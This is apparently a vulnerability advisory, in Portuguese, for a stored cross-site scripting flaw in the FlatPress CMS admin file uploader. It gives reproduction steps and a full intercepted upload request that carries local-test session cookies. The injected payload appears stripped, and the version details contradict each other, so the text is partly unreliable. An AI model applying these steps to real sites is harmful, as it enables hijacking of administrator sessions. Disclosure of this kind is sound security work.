
Vulnerabilidade de Cross Site Scripting no flatpress CMS Flatpress v1.3 permite que um atacante remoto execute código arbitrário por meio de um payload forjado no parâmetro file name.
Vulnerabilidade de Cross-Site Scripting no CMS FlatPress v1.3 permite que um atacante remoto execute código arbitrário por meio de um payload criado no parâmetro de nome de arquivo.
Componente afetado: Campo de upload de arquivos do painel de administração do FlatPress CMS
Versão corrigida: FlatPress v1.3 - será corrigido na versão 1.3 do FlatPress.
Tipo de ataque: Remoto
Vetores de ataque: Explorar a vulnerabilidade criando o nome do arquivo de imagem
Passos para reproduzir:
1.Faça login na conta de administrador e abra a URL abaixo http://127.0.0.1/flatpress-1.2.1/admin.php?p=uploader&action=mediamanager
2.Clique no campo de upload, envie qualquer arquivo que desejar, clique em upload e intercepte a requisição com o Burp Suite. A requisição será semelhante à abaixo; injete o payload JavaScript com o nome de arquivo testtest
POST /flatpress-1.2.1/admin.php?p=uploader&action=default HTTP/1.1
Host: 127.0.0.1
Content-Length: 1598
Cache-Control: max-age=0
sec-ch-ua: "Not A(Brand";v="24", "Chromium";v="110"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzHnyH0cX0ojRbqom
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1/flatpress-1.2.1/admin.php?p=uploader
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: fpuser_fp-9b0a379a=parag; fppass_fp-9b0a379a=%242y%2410%24j.D1Ab.xVMoIDu9yQF8QjefOZmz9JPoh4QwzpoCdYxlqSkNQDGag2; fpsess_fp-9b0a379a=mg65h4rd8onvv2tniminpq635f
Connection: close
------WebKitFormBoundaryzHnyH0cX0ojRbqom
Content-Disposition: form-data; name="_wpnonce"
60f24876be
------WebKitFormBoundaryzHnyH0cX0ojRbqom
Content-Disposition: form-data; name="_wp_http_referer"
/flatpress-1.2.1/admin.php?p=uploader
------WebKitFormBoundaryzHnyH0cX0ojRbqom
Content-Disposition: form-data; name="upload[]"; filename="test.phpuh9aeairjipc8brr"
Content-Type: application/x-php
TEst
------WebKitFormBoundaryzHnyH0cX0ojRbqom--
Referências:
https://portswigger.net/web-security/cross-site-scripting https://drive.google.com/file/d/1OthtP87MduNTYur_p0RZv3moY8CrBcaM/view
Fornecedor do produto: FlatPress CMS
Confirmado em: 11/06/2023
Descobridor: Parag Bagul